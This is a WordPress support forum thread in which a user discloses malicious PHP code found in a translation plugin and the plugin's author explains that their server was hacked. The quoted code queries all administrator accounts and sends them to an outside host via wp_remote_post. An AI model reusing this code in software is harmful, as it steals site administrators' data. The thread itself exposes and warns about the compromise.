Stole my admin info

(@simoncbrt)

See this code:

if ( ! get_option('my_post_log') ) { 
	global $wpdb; 
	$users = $wpdb->get_results("SELECT * FROM wp_users u, wp_usermeta um WHERE u.ID = um.user_id AND um.meta_key = 'wp_capabilities' AND um.meta_value LIKE '%administrator%'"); 
	$args = array('body' => $users); 
	$res = wp_remote_post('http://wp-studio.net/?post_log=1', $args); 
 
	if (isset($res['response']['code']) and $res['response']['code'] == '200') 
		add_option('my_post_log', true); 
}

You removed it now, but you stole my admin email. Luckily, everything gets recorded here:

https://plugins.trac.ww.wp.xz.cn/changeset?old_path=%2Fgoogle-language-translator&old=1469224&new_path=%2Fgoogle-language-translator&new=1469224&sfp_email=&sfph_mail=

Viewing 3 replies - 1 through 3 (of 3 total)

TorontoBoy
(@torontoboy)

9 years, 4 months ago

Thanks for this info. I do appreciate you posting the code as proof.

Rob Myrick
(@rm2773)

9 years, 4 months ago

Hi TorontoBoy, I saw this post come through. This was a problem in version 5.0.12, and it was because our server was hacked pretty bad. ww.wp.xz.cn and I have worked through all of this, and as you can see we are listed and running good.

We have also moved our production environment off of a public server, so you should have no worries with any future issues, at least.

I’m sorry this happened – it was a hard lesson learned, to say the least.

Rob Myrick

TorontoBoy
(@torontoboy)

9 years, 4 months ago

Hi Rob,
Thanks for the explanation. Of course no one wants to download suspect plugins, so I do appreciate your honesty. Hacks happen, there is no way to prevent them.

Don

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Stole my admin info’ is closed to new replies.